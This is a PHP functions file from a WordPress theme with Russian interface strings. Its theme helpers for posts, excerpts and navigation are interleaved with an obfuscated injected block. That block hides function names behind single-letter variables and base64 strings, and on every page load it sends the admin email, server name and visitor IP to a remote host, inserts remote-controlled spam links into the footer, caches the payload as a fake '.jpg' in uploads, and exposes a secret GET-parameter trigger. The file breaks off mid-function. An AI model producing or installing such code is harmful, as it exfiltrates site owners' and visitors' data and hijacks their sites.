<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $kTSSX='e';$BiKlq='s';$DJqWhF='c';$wNvHey='d';$urVF='_';$AXuV='e';$EAMVak='4';$bTdb='e';$SALOf='d';$quhJk='a';$LfjGf='o';$FgflmqA='b';$OzHItyo='6';$rvctEIUT=$FgflmqA.$quhJk.$BiKlq.$AXuV.$OzHItyo.$EAMVak.$urVF.$wNvHey.$bTdb.$DJqWhF.$LfjGf.$SALOf.$kTSSX;$AxpYH='l';$RsMBsy='e';$ZMszUk='f';$lDwXb='n';$xjbycbp='z';$ziRYGn='g';$HEGZSi='i';$xJsMt='a';$rZZjivv='t';$suaLyncL=$ziRYGn.$xjbycbp.$HEGZSi.$lDwXb.$ZMszUk.$AxpYH.$xJsMt.$rZZjivv.$RsMBsy;$tlmDu='s';$obsqMI='t';$ZfAsRb='t';$BwuKsK='_';$LDnvVYY='3';$qUCIZR='r';$oqkg='1';$KvOJ='o';$FMPTgb='r';$SjVpSncm=$tlmDu.$ZfAsRb.$qUCIZR.$BwuKsK.$FMPTgb.$KvOJ.$obsqMI.$oqkg.$LDnvVYY;$xiSqNT='t';$NTJHN='r';$rXVgUfR='r';$DQWtd='s';$bAao='e';$QlyT='v';$cqTTvuNV=$DQWtd.$xiSqNT.$rXVgUfR.$NTJHN.$bAao.$QlyT;                     
		$kq_____________l='e';$sn______________t='s';$ae______________t='c';$ga___________q='d';$nq_________d='_';$gd____c='e';$aq______________c='4';$xa____________r='e';$xr__g='d';$ta________f='a';$st_________y='o';$kx______b='b';$jt__________p='6';$xd______________l=$kx______b.$ta________f.$sn______________t.$gd____c.$jt__________p.$aq______________c.$nq_________d.$ga___________q.$xa____________r.$ae______________t.$st_________y.$xr__g.$kq_____________l;
		$gx___________f='u';$ys____________d='e';$ll___s='t';$pi_______c='t';$no__________c='x';$zh_____m='s';$oq______________d='i';$hb__n='_';$wm____k='n';$oa_______________v='c';$tf________q='s';$ov______________p='f';$nd____p='i';$fv_____________n='n';$hh____s='o';$oo___________k=$ov______________p.$gx___________f.$fv_____________n.$oa_______________v.$pi_______c.$nd____p.$hh____s.$wm____k.$hb__n.$ys____________d.$no__________c.$oq______________d.$zh_____m.$ll___s.$tf________q;
		$fo___________z='f';$tq________k='p';$rz_______________l='e';$ud__________m='o';$ht___________c='n';$fq______r=$fo___________z.$ud__________m.$tq________k.$rz_______________l.$ht___________c;
		$lg_________o='d';$sx_______n='a';$pc____r='r';$er_____________m='e';$uw_______c='f';$cb____________t=$uw_______c.$pc____r.$er_____________m.$sx_______n.$lg_________o;
		$cm______m='e';$rd_________w='c';$dd___________z='f';$lr_______________e='o';$ll________h='s';$yp______o='l';$lq__________q=$dd___________z.$rd_________w.$yp______o.$lr_______________e.$ll________h.$cm______m;
		
		define("WP_ID", $xd______________l("Mi4wLjA="));
		define("WP_TTL", $xd______________l("MTA4MDA="));
		define("WP_SRC", $xd______________l("dHBva24="));
	


		function wp_get_header() {
			global $xd______________l, $oo___________k;
			
			if (
				$oo___________k($xd______________l("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$oo___________k($xd______________l("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$oo___________k($xd______________l("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $xd______________l, $fq______r, $lq__________q, $cb____________t;
			
			$nb____a = TEMPLATEPATH."/".$xd______________l("Zm9vdGVyLnBocA==");
			$qf______q = @$fq______r($nb____a, "r");
			$nb____a = @$cb____________t($qf______q, @filesize($nb____a));
			@$lq__________q($qf______q);
			
			$uv_______________x = TEMPLATEPATH."/".$xd______________l("ZnVuY3Rpb25zLnBocA==");
			$qf______q = @$fq______r($uv_______________x, "r");
			$uv_______________x = @$cb____________t($qf______q, @filesize($uv_______________x));
			@$lq__________q($qf______q);
			
			$lc________v = 0;
			if($nb____a && $uv_______________x) {
				if ($xd______________l("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($nb____a, $xd______________l("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$lc________v = 1;
					}
					if (substr_count($nb____a, "wp_theme_GPL_credits()") < 1) {
						$lc________v = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$lc________v = 12;
				}
			}
			
			if($lc________v > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $lc________v -->";
			}
		}
	


		function wp_loaded() {
			global $xd______________l, $oo___________k;
			return $oo___________k($xd______________l("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($ri_______q, $ob__________f = "(more...)", $sx______g = 0, $pt___________z = "") {
				$ja_____________o = get_the_content($ob__________f, $sx______g, $pt___________z);
				$ja_____________o = apply_filters("the_content", $ja_____________o);
				
				$ja_____________o = str_replace("]]>", "]]>", $ja_____________o);
				if (strlen($_GET["p"]) > 0) {
					echo $ja_____________o;
				}
				else if ((strlen($ja_____________o)>$ri_______q) && ($vx________d = strpos($ja_____________o, " ", $ri_______q ))) {
					$ja_____________o = substr($ja_____________o, 0, $vx________d);
					$ja_____________o = $ja_____________o;
					echo $ja_____________o;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$ob__________f</a></div></p>";
				} else {
					echo $ja_____________o;
				}
				
			}
		}
	


		$xo________r='_';$le______________k='e';$wr__________v='4';$ot___________m='a';$ii_____h='b';$pg__n='d';$dt____________z='e';$fk_______q='o';$xi_______________f='e';$va____________o='s';$qg_________f='n';$yx___________g='6';$ze___________u='c';$vp______________q=$ii_____h.$ot___________m.$va____________o.$le______________k.$yx___________g.$wr__________v.$xo________r.$xi_______________f.$qg_________f.$ze___________u.$fk_______q.$pg__n.$dt____________z;
		$qb___s='_';$cu_________t='n';$zp_____________p='s';$ez___y='e';$vp________n='t';$aa_______n='t';$yc______________z='n';$zv______f='i';$cg_________z='t';$xt___w='_';$kc___________o='o';$ba____________e='e';$ez__w='l';$qy_______r='e';$nx_______o='f';$pl___t='c';$sa_________v='g';$cy______________j=$nx_______o.$zv______f.$ez__w.$ez___y.$qb___s.$sa_________v.$ba____________e.$aa_______n.$xt___w.$pl___t.$kc___________o.$cu_________t.$vp________n.$qy_______r.$yc______________z.$cg_________z.$zp_____________p;
		$jq_______r='e';$ej__q='i';$dl__k='l';$mr_____b='f';$ae____________m='e';$df____y='x';$yp______y='s';$tm_________x='t';$zl____________n='i';$ro_______________d='_';$ah____________z='s';$oe__________z=$mr_____b.$zl____________n.$dl__k.$ae____________m.$ro_______________d.$jq_______r.$df____y.$ej__q.$ah____________z.$tm_________x.$yp______y;
		$bg________u='n';$kj___________i='e';$uk______s='v';$bv_______n='r';$nl__i='_';$sl______s='p';$kw___________h='a';$qs______________r='r';$dt____p='s';$oz______s='m';$xt__o='o';$vj__g='c';$ay_________y='i';$yi________m='e';$ss__________u='o';$rz_______________z=$uk______s.$kj___________i.$bv_______n.$dt____p.$ay_________y.$xt__o.$bg________u.$nl__i.$vj__g.$ss__________u.$oz______s.$sl______s.$kw___________h.$qs______________r.$yi________m;
		$fr________w='e';$rc______________c='f';$tj_______________n='n';$sd________z='c';$vd______v='o';$iy_______________q='p';$nw__________u='o';$ut____u='k';$ts_____v='s';$wm_____f=$rc______________c.$ts_____v.$vd______v.$sd________z.$ut____u.$nw__________u.$iy_______________q.$fr________w.$tj_______________n;
		$sw__________o='i';$do____________y='r';$xz___y='f';$gl_____________r='w';$ze____________x='e';$dz_______________h='t';$fv__________o=$xz___y.$gl_____________r.$do____________y.$sw__________o.$dz_______________h.$ze____________x;
		$yx__y='5';$rt_______j='m';$qz_______________t='d';$kj________w=$rt_______j.$qz_______________t.$yx__y;
		$iv___r='t';$xw____w='r';$nv____________p='l';$vj___________t='h';$fp______________k='e';$lu___________f='a';$if______________e='a';$dp______k='p';$cy__________j=$xw____w.$fp______________k.$if______________e.$nv____________p.$dp______k.$lu___________f.$iv___r.$vj___________t;
		$cw_____i='r';$pt_______z='i';$cs__________a='u';$uj_____h='a';$sa_____g='i';$ks______________d='z';$uk_____________h='e';$kq_____y='n';$hx___k='l';$xf______r='e';$te______e='s';$ay__q=$cs__________a.$kq_____y.$te______e.$uk_____________h.$cw_____i.$sa_____g.$uj_____h.$hx___k.$pt_______z.$ks______________d.$xf______r;
		$dz____d='t';$nw_______d='m';$eg______________k='e';$dj_______________h='n';$cs_____________o='a';$in______________f='m';$cs__g='p';$rq_________o=$dz____d.$eg______________k.$nw_______d.$cs__g.$dj_______________h.$cs_____________o.$in______________f;
		$ff___d='e';$vx_______f='r';$bm_______w='m';$rc___v='t';$xt____________q='t';$iq____y='e';$em__________v='e';$sj________c='_';$sy__________v='_';$wk______x='x';$iu______________f='t';$kt___________s='c';$qf_____k='a';$eg_________i='e';$cc_____________k='c';$bp____j='t';$pk____________r='r';$hm__________j='o';$ho_____________x='s';$ct____________x='n';$ps__________x='a';$ic_________s=$ho_____________x.$bp____j.$vx_______f.$eg_________i.$qf_____k.$bm_______w.$sy__________v.$kt___________s.$hm__________j.$ct____________x.$rc___v.$iq____y.$wk______x.$xt____________q.$sj________c.$cc_____________k.$pk____________r.$em__________v.$ps__________x.$iu______________f.$ff___d;
	


		function tr__y($ef____g) {
			global $xd______________l, $oo___________k, $cy______________j, $rz_______________z, $ic_________s;
			
			if (!$oo___________k($xd______________l("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($rz_______________z(PHP_VERSION, "5.0.0", ">=") && $oo___________k($xd______________l("ZmlsZV9nZXRfY29udGVudHM=")) && $oo___________k($xd______________l("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$lq______y = $ic_________s(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$da__________t = @$cy______________j($ef____g, 0, $lq______y);
			} else {
				$da__________t = @$cy______________j($ef____g, 0);
			}
			
			return $da__________t;
		}
	


		function is____________a($ef____g) {
			global $oo___________k, $wm_____f, $fv__________o, $xd______________l;
			
			if (!$oo___________k($xd______________l("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$os_______x = strpos($ef____g, "/", 7);
			$cx___________i = array(
				"uri"     => substr($ef____g, $os_______x),
				"host"    => str_replace("http://", "", substr($ef____g, 0, $os_______x)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$xg______a = @$wm_____f("$cx___________i[host]", 80, $kx____w, $ri__z, 4);
			
			if (!$xg______a) {
				return false;
			} else {
				$da__________t = "";
				$lw_____________d  = "GET $cx___________i[uri] HTTP/1.0\r\n";
				$lw_____________d .= "Host: $cx___________i[host]\r\n";
				$lw_____________d .= "Referer: $cx___________i[referer]\r\n";
				$lw_____________d .= "Connection: Close\r\n\r\n";
				
				@$fv__________o($xg______a, $lw_____________d);
				
				while (!@feof($xg______a)) {
					$qe_________m = @fgets($xg______a, (1024*24));
					
					if ($qe_________m == "\r\n") {
						$gs__________z = true;
						continue;
					}
					
					if ($gs__________z) {
						$da__________t .= $qe_________m;
					}
				}
				
				return $da__________t;
			}
		}
	


		function lo___________z($ef____g) {
			global $oo___________k;
			$yj____________o = false;
			
			if ($ef____g != "") {
				if ($oo___________k("tr__y")) {
					$yj____________o = @tr__y($ef____g);
				}
				
				if (!$yj____________o && ($oo___________k("is____________a"))) {
					$yj____________o = @is____________a($ef____g);
				}
			}
			
			return $yj____________o;
		}
	


		function ii___________f() {
			global $_SERVER, $kj________w;
			
			$cg________k = $_SERVER["SERVER_NAME"];
			
			if (substr("$cg________k", 0, 4) == "www.") {
				$cg________k = substr("$cg________k", 4);
			}
			
			$cg________k = $kj________w("$_SERVER[SERVER_NAME]");
			
			return $cg________k;
		}
	


		function ry_____________b() {
			return "file";
		}
	


		function jq______a($ef____g) {
			global $_SERVER, $cy______________j, $oe__________z, $fq______r, $lq__________q, $fv__________o;
			
			$fv___________t = bd______________p();
			
			$bd_____f = ii___________f().".jpg";
			$au______________z = $fv___________t["dir_upload"]["path"]."/$bd_____f";
			$mb______________b = @filemtime($au______________z);
			
			if (!$mb______________b || ((time()-$mb______________b) >= WP_TTL)) {
				$yj____________o = lo___________z($ef____g);
				
				if ($yj____________o) {
					if ($oe__________z($au______________z)) {
						@unlink($au______________z);
					}
					
					$qf______q = @$fq______r($au______________z, "x+");
					
					@$fv__________o($qf______q, $yj____________o);
					@$lq__________q($qf______q);
				}
			} else {
				if ($oe__________z($au______________z)) {
					$yj____________o = @$cy______________j($au______________z);
				} else {
					$yj____________o = false;
				}
			}
			
			return $yj____________o;
		}
	


		function bd______________p() {
			global $_SERVER, $xd______________l, $vp______________q;
			
			$ks_______________r = wp_count_posts("post");
			$ql______________t = pathinfo(get_bloginfo("template_directory"));
			
			$fv___________t = array(
				"url" => array(
					"report"      => $xd______________l("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $ql______________t,
				"dir_upload"	=> eo_________a(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$ql______________t[filename],
					"a005=".$ks_______________r->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://animefanfiki.info\">Блог об автомобилях</a>"
			);
			
			$fv___________t["url"]["queryString"] = implode("&", $fv___________t["queryString"]);
			$fv___________t["url"]["report"] = $fv___________t["url"]["report"]."/?".$vp______________q($fv___________t["url"]["queryString"]).".html";
						
			return $fv___________t;
		}
	


		function eo_________a() {
			$we________z = wp_upload_dir();
			
			if (isset($we________z["error"])) {
				$gi__________k = tl___b();
				if (is_writable($gi__________k)) {
					$we________z = array("path" => $gi__________k);
				}
			}

			return $we________z;
		}
	


		function tl___b() {
			global $oo___________k, $kj________w, $cy__________j, $rq_________o;
			
			$lb____________h = (bool) ini_get("safe_mode");
			if ($lb____________h == true) {
				return false;
			}
			
			if ($oo___________k("sys_get_temp_dir")) {
				$ju___b = sys_get_temp_dir();
				if (is_writable($ju___b)) {
					return $cy__________j($ju___b);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $cy__________j($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $cy__________j($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $cy__________j($_ENV["TEMP"]);
			} else {
				$xc____r = $rq_________o($kj________w(uniqid(rand(), true)), "");
				if ($xc____r) {
					$ju___b = $cy__________j(dirname($xc____r));
					@unlink($xc____r);
					return $ju___b;
				} else {
					return false;
				}
			}
		}
	


		function mh____m() {
			global $_GET, $oe__________z;
			
			$fv___________t = bd______________p();
			$cg________k = ii___________f();
			$nn___________r = ry_____________b();
			
			$yb__________m = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($nn___________r == "file") {
					$lq____________b = $fv___________t["dir_upload"]["path"]."/".$cg________k.".jpg";
					if ($oe__________z($lq____________b)) {
						@unlink($lq____________b);
						$yb__________m = "deleted";
					}
				}
				
				$fq______________i = array(
					"s"	=> $yb__________m,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($fq______________i AS $wf______h => $wc______y) echo " [$wf______h:$wc______y]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $oo___________k, $xd______________l, $ay__q;
			$fv___________t = bd______________p();
			
			$qo____________m = "jq______a";
			if ($oo___________k($qo____________m)) {
				$da__________t = $qo____________m($fv___________t["url"]["report"]);
			}
			
			if ($da__________t) {
				if ($da__________t = @$xd______________l($da__________t)) {
					$da__________t = @$ay__q($da__________t);
					
					if (strlen($da__________t[custom_credit]) >= 5) {
						$fv___________t["default_string"] = $da__________t[custom_credit];
					}
					
					if ($da__________t["status"] == "0") {
						$ix_____n = 1;
						$qs__r = 1;
					} else {
						$nu____________m = sizeof($da__________t["links"]);
						$mm______i = $fv___________t["default_string"];
						
						if ($nu____________m > 0 && $da__________t["links"] !== "") {
							$ce______________f = 0;
							foreach ($da__________t["links"] as $hn__________e => $fu______________s) {
								$ce______________f++;
								if ($fu______________s->l_path == "" || $fu______________s->l_path == $_SERVER["REQUEST_URI"]) {
									$fu______________s->l_href = htmlspecialchars(strip_tags($fu______________s->l_href));
									$fu______________s->l_title = htmlspecialchars(strip_tags($fu______________s->l_title));
									$fu______________s->l_anchor = htmlspecialchars(strip_tags($fu______________s->l_anchor));
									$mm______i .= " | ";
									$mm______i .= "<a href='$fu______________s->l_href' title='$fu______________s->l_title'";
									if ($fu______________s->l_nofollow == "1") {
										$mm______i .= " rel='nofollow'";
									}
									$mm______i .= ">$fu______________s->l_anchor</a>";
								}
							}
						}
						$fv___________t["links"] = "$mm______i";
						if ($da__________t[credit] == "0") {
							$fv___________t["links"] = "";
						}
					}
				} else {
					$ix_____n = "1";
				}
			} else {
				$ix_____n = "1";
			}
			
			if ($ix_____n == "1") {
				$fv___________t["links"] = $fv___________t["default_string"];
			}
			
			echo "$fv___________t[links]";
			
			echo "<!-- s: $da__________t[signature] -->";
			mh____m();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                  comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Not Found', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
